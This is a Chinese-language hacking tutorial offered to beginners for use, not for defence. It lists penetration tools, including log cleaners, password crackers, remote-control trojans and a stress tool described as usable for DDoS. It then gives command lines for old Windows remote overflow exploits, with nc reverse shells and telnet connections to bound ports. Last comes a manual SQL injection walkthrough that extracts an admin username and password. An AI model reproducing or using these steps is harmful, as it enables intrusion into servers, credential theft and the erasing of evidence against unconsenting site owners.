渗透工具一、基于网站的渗透1、名称:Acunetix Web Vulnerability Scanner 6功能:网站漏洞扫描器。
平台:Windows2、名称:IBM Rational AppScan 7.8功能:网站漏洞扫描器。
平台:Windows3、名称:Jsky功能:网站漏洞扫描器。
平台:Windows4、名称:DTools功能:阿D的多功能入侵工具,带扫描、植马等。
平台:Windows5、名称:wepoff功能:网站漏洞扫描器。
平台:Linux / Unix6、名称:Domain3.6功能:网站旁注工具。
平台:Windows7、名称:casi功能:PHP+MYSQL注射工具。
平台:Windows8、名称:HP WebInspect 7.7功能:网站漏洞扫描器。
平台:Windows9、名称:php_bug_scanner功能:PHP程序漏洞扫描器。
平台:Windows10、名称:多线程网站后台扫描工具功能:扫描网站后台管理登陆地址。
平台:Windows11、名称:NStalker功能:网站爬虫。
平台:Windows12、名称:挖掘鸡 v6.5功能:挖掘搜索引擎关键字。
平台:Windows13、名称:cookie注入工具功能:cookies注入辅助工具。
平台:Windows14、名称:httpup功能:通用HTTP上传程序。
平台:Windows二、基于系统的渗透1、名称:nmap功能:系统端口扫描器。
平台:Windows2、名称:Nessus功能:系统漏洞扫描器。
平台:Windows3、名称:X-Scan功能:系统漏洞扫描器。
平台:Windows4、名称:SuperScan功能:系统端口扫描器。
平台:Windows5、名称:SSS功能:SSS扫描器。
平台:Windows6、名称:NetCat功能:瑞士军刀。
平台:Windows7、名称:Apache Tomcat Crack功能:Tomcat弱口令扫描器。
平台:Windows8、名称:iisputscanner功能:中间件扫描器。
平台:Windows9、名称:Metasploit framework功能:渗透辅助工具。
平台:Windows10、名称:Encoder功能:编码转换。
平台:Windows11、名称:awstats功能:日志分析工具。
平台:Windows12、名称:logclear功能:日志清除工具。
平台:Windows13、名称:黑刀超级字典生成器功能:密码生成。
平台:Windows14、名称:溯雪功能:破解网站、邮箱、BBS登陆密码。
平台:Windows15、名称:MD5crack功能:MD5密码破解工具包。
平台:Windows16、名称:webbench功能:压力测试工具,可用于DDOS。
平台:Linux/Unix17、名称:netstumbler功能:无线网络攻击工具。
平台:Windows18、名称:wifizoo功能:无线网络攻击工具。
平台:Linux/Unix19、名称:arpsniffer功能:局域网嗅探抓包。
平台:Windows20、名称:ethereal功能:局域网嗅探抓包。
平台:Windows21、名称:SnifferPro功能:局域网嗅探抓包。
平台:Windows22、名称:WinSock Expert功能:网站上传抓包。
平台:Windows23、名称:logclear功能:日志清除工具。
平台:Windows24、名称:ByShell 、DG远控、PcShare、TeamViewer功能:远程控制工具。
平台:Windows三、基于数据库的渗透1、名称:DSQLTools功能:啊D 的SQL注入工具。
平台:Windows2、名称:nbsi3.0功能:MSSQL注入工具。
平台:Windows3、名称:mysqlweak功能:Mysql数据库弱口令扫描器。
平台:Windows4、名称:pangolin功能:数据库注入工具。
平台:Windows5、名称:db2utils功能:DB2漏洞利用工具。
平台:Linux / Unix6、名称:oscanner功能:Oracle扫描工具。
平台:Windows7、名称:oracle_checkpwd_big功能:Oracle弱口令猜解工具。
平台:Windows四、缓冲区溢出漏洞利用工具1、名称:sql2功能:ms-sql的远程溢出工具。
平台:Windows2、名称:thcsql功能:ms-sql的远程溢出工具;。
平台:Windows3、名称:ispc功能:unicode漏洞的利用工具。
平台:Windows4、名称:lis5hack、idahack功能:.printer漏洞的远程溢出工具。
平台:Windows5、名称:snake IIS功能:Snake ida、idq的远程溢出工具。
平台:Windows6、名称:aspcode功能:asp漏洞远程溢出工具。
平台:Windows7、名称:webdavx3功能:webdav漏洞远程溢出工具(isno)。
平台:Windows8、名称:webdav功能:webdav漏洞溢出工具(yuange)。
平台:Windows9、名称:rpc_locator、 rpc功能:RPC LOCATOR漏洞的远程溢出工具。
平台:Windows10、名称:media功能:media server远程溢出工具。
平台:Windows11、名称:winrpcdcom功能:Windows rpcdcom的远程溢出工具。
平台:Windows12、名称:w2krpcdcom功能:Windows rpcdcom的远程溢出工具(反向连接)。
平台:Windows13、名称:rpcloname功能:windows rpcdcom长文件名的远程溢出程序。
平台:Windows14、名称:msghack功能:Windows messenger漏洞的远程溢出程序(ms03-043)。
平台:Windows15、名称:ms03049功能:Windows workstation漏洞的远程溢出程序(ms03-049)。
平台:Windows16、名称:winfp30reg2功能:Windows frontpage fp30reg.dll的远程溢出程序(ms03-051)。
平台:Windows新手必看之注入和溢出基础教程(附软件下载地址)溢出入侵因为时间的原因我只介绍下这些漏洞的是如何利用的不介绍他们是怎么产生的至于怎么修补我会提一下的~~~在介绍漏洞之前我先介绍几个很不错的扫描软件,毕竟扫描是基础x-san这个扫描软件我想大家不在陌生!!他是一个全方位扫描漏洞的软件,他主要是用于扫描漏洞的,当然其他方面的比如固定端口的扫描,ip的扫描也都是可以的缺点就是速度太慢~~~nmap这个扫描软件功能比较强大!!是居于cmd界面操作的,只要按照他的提示使用即可,扫描的速度也比较的快,要想快速搞定一台服务器的朋友还是用这个扫描软件比较好x-way这个扫描软件他的功能与其他的扫描软件不同!!不只是扫描还包括了很多的小工具!!比如查询器,猜解机...如果你要猜测什么账号和密码方面的用这个就不错了现在我在把常见的端口所对应的服务给大家列出来!!我觉得了解一下还是很重要的~~80全球信息网超文本传输协议(www)110pop3 服务器(邮箱发送服务器)135 (tcp/ip)查询服务dns139共享资源端口(netbios-ssn)143imap电子邮件443安全服务444snpp445nt的共享资源新端口(139)990ftps995pop3s1026 win2000 的internet信息服务1243 sub-7木马1524ingreslock后门3128 squidhttp代理服务器的默认端口3389 win2000 远程登陆端口4899remote administrator [远程控制]7626冰河(木马) 默认端口12345 netbus木马默认端口12346 netbus木马默认端口还有象流光呀什么的我想大家都比较熟悉了~~这里就不说了!!好了下面开始介绍漏洞和漏洞的利用方法!!其操作都是在cmd 下面操作~~漏洞的利用方法我都翻译成了中文,很适合那种英语学的比较菜的朋友!!1.webdav漏洞首先要开放80端口要安装了iis用到的工具webdavx3利用方法webdavx3 目标主机ip2.rpc漏洞工具winrpcdcom利用方法winrpcdcom 目标主机ip(操作系统类型)目标主机ip 3.idq首先要安装了iis利用正向连接1.溢出2.telnet 登陆telnet 目标主机ip 端口反响连接nc-l -p 本机端口3.dcomrpc 溢出漏洞利用dcomrpc -d 目标主机ip [ortions]有提示[ortions] -l 6668 绑定6668端口在6668端口溢出4.rpc long 文件名溢出此漏洞可以通过135(tcp/ip)139 445 593 端口发起攻击用msdcomscanner.exe 软件扫描漏洞利用rpc2sbaa.exe os(操作系统类型0 1)目标主机ip5.rpc locator 溢出漏洞扫描软件rpc-locator.exe ip段看说明通过注册表改掉ip在清空连接建立空连接最好溢出xlocator操作系统类型6.iis.asp 影射分块编码远程溢出漏洞aspcode溢出扫描的时候扫描iis漏洞就可以了漏洞利用aspcode.exe 目标主机ip[asp文件](iisstart.asp)开放的web端口是默认的80就不用填win2000系统不用填写是winxp的话就要填写winxp7.sql hello exploit 漏洞溢出攻击首先扫描1433端口分析对方是否开放了1433端口用dotpot port ready 1.6 来扫描是否开放1433端口溢出工具sqlhello漏洞利用sqlhello 反向连接工具sqlhello 目标主机ip 目标主机端口1433 本机ip 本机端口正向连接工具sqlhello2sqlhello2 目标主机ip 目标主机端口14338. mssql sql2 溢出首先扫描1433端口是否开放溢出工具nc 和sql2.exe漏洞利用sql2.exe 目标主机ip 本机ip 监听的本机端口sql的版本一般为09.ser-u溢出首先扫描ftp弱口令溢出工具serv-u 3.x/4.xserv -i 目标主机ip -t 0(操作系统类型)-u ftp登陆账号-pftp登陆密码-f 21对方开放的端口默认为21 -s 溢出后反响连接的端口也就上自己的端口10 电影网站入侵real server溢出开放了real networks real sever 服务的服务器开放后其开放的断口的默认值为主要检测554端口rtsp端口554pna 端口7070http 端口80mms 端口1755监控端口9090管理端口自己设置其他的断口号也可以改变漏洞利用所要用到的工具realex溢出步骤1.realex host(目标主机ip) 操作系统类型2. telnet host 31337绑定31337断口在第2个cmd窗口进行连接要先溢出在连接主要用于入侵电影网站11 dameware mina remote control远程缓冲区溢出漏洞益处首先扫描6129 端口是否开放如果开放才有可能存在这个漏洞方法反响连接工具利用dameweird.exe 目标主机ip 本机ip 本地监听端口溢出版本12.windows meida 远程益处漏洞媒体服务产生的一个漏洞首先扫描1755 7007 6666 7778 端口是否开放溢出工具ncmedia.exe漏洞利用media 目标主机ip -p 目标主机端口(80)-r 路径(/scripts/nsiislog.dllnc -vv 目标主机ip34816(确定的)-vv邦定34816端口的意思不是反响连接13.windows messenger服务的远程溢出(消息服务产生的漏洞)扫描工具messengerscan方法scanmsgrtarget=192.168.0.1-192.168.0.255(一个网段)漏洞利用第一步msghack -h 目标主机ip -v目标主机操作系统-i 目标主机语言版本-s 操作系统的补丁号(0 1)-r 本机ip -p 监听的本机端口第二步nc -vv -l -p本机端口 -vv邦定某个端口-l -p反响连接或监听某个端口综上所述溢出入侵的方法其实很简单要么正向连接要么反向连接正向连接就是用工具将他直接溢出反响连接那么就要用到nc这个小工具因为反向连接是让目标主机来连接你,而不是你去连接目标主机,反向连接很容易逃过防火墙的检测..当然还有其他方面的漏洞ms04 ms05,代理,输入法的漏洞....只要找到相应的工具将他溢出就可以了以上的漏洞当然在实际电脑中很难找到了,我讲的只是漏洞利用的方法!!至于上面的漏洞怎么修复,大部分只要不断的升级打补丁就可以了~~至于溢出之后怎么办就*大家发挥了~~~~*********好了现在我说下注入********首先要了解下基础的手动注入1.判断用and 1=1 and 1=2 (在ie浏览器中输入) eg: and1=1and 1=1 返回正常页面================================and 1=2返回错误页面说明存在注入点2.猜表and 0<>(select count(*) from *) (同样在ie中输入)eg: and 0<>(select count(*) from*)这个就最基础,最大众话的查询语句了.至于语句的作用我会给大家说明.但是具体的意思请大家自行找有关sql查询的资料看.and0<>(select count(*) from admin) ---判断是否存在admin这张表其中admin是可以换的,其他部分不要换.一般的表的名称无非是admin adminuser user pass password等..3.猜帐号数目and 0<(select count(*) from admin)0可以改为其他的< 就是说看看1是不是小于里面的帐号数目如果返回的页面是正确的说明是对的,如果错误的说明不是的那么我们就要换成2< 3< ..... 当然啦你也可以用1> 2>来猜4.猜解字段名称and 1=(select count(*) from admin where len(name)>0)用户字段名称and 1=(select count(*) from admin where len(password)>0)密码字段名称猜解表里面的字段名称了and 1=(select count(*) from admin wherelen(*)>0)--- 这个是核心语句哦也是大众话的语句.我们要做的就是在len( ) 括号里面加上我们想到的字段名称.我们先来猜用户名字段我用的是name ok对了.那么下面我们就来猜密码字段了.我先用pass晕死不是的,那么我们再换成password看看ok对了.那么用户字段和密码字段我们都猜解出来了.下面就是猜解长度和具体的字符了.5.猜解各个字段的长度猜解长度就是把and 1=(select count(*) from admin wherelen(*)>0)>0 换成其他的只道猜到=?返回正确页面为止,好,下面我们开始吧.首先是帐号长度...刚刚帐号字段是nameand 1=(select count(*) from admin wherelen(name)>0) 正确and 1=(select count(*) from admin where len(name)>1)正确and 1=(select count(*) from admin where len(name)>2) 正确and1=(select count(*) from admin where len(name)>6) 错误and 1=(selectcount(*) from admin where len(name)>5) 正确and 1=(select count(*) fromadmin where len(name)>4) 正确那么我们就可以知道长度是 6and 1=(select count(*)from admin where len(name)=6) 正确呵呵对了吧,=6返回的是正确页面.下面是密码字段的长度and 1=(select count(*) from admin where len(password)>0) 正确and1=(select count(*) from admin where len(password)>6) 正确and 1=(selectcount(*) from admin where len(password)>10) 正确and 1=(select count(*)from admin where len(password)>15) 错误and 1=(select count(*) from adminwhere len(password)>14) 错误and 1=(select count(*) from admin wherelen(password)>13) 错误and 1=(select count(*) from admin wherelen(password)>12) 错误and 1=(select count(*) from admin wherelen(password)>11) 正确ok长度是12name 6password 12长度出来了,下面就是具体的字符了猜解字符and 1=(select count(*) from adminwhere left(name,1)='a') ---猜解用户and 1=(select count(*) from admin whereleft(password,1)='a')就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了and1=(select count(*) from admin where left(pass,1)='a') ---猜解密码left(name,1)='a' 注意了1的位置就是你要猜解的字符的位置.and 1=(select count(*) fromadmin where left(name,1)='a') ---猜解用户帐号的第一位and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位就这样下去只到猜玩为止.and 1=(select count(*) from admin whereleft(name,1)='a') 错误.....and 1=(select count(*) from admin whereleft(name,6)='pclzyq')因为这个猜解过程比较漫长所以我就直接给出答案了.and 1=(selectcount(*) from admin where left(password,1)='a') 错误.......and 1=(selectcount(*) from admin where left(password,12)='pclzyq000215')直接给出了答案.name = pclzyqpassword = pclzyq0002157.找出登陆口,进行登陆一般的登陆口:admin.aspadmin_index.aspadmin/index.aspadmin/admin.asp....这些东西大家可以去逐渐积累......实际上大多数的注入是要用到工具的nb2(后台账号,密码猜解工具)acac2(注入点页面查找工具)工具的使用比较简单,大家慢慢斟酌**但是实际上往往大多数的漏洞用工具是检测不出来的,用工具也根本无法注入,这个时候我们就不的不用到手工注入了,下面主要说下php注入的基础******php注入不象asp那样有nbsi之类的超强工具,其实知道他的注入原理后,完全可以实现手工注入。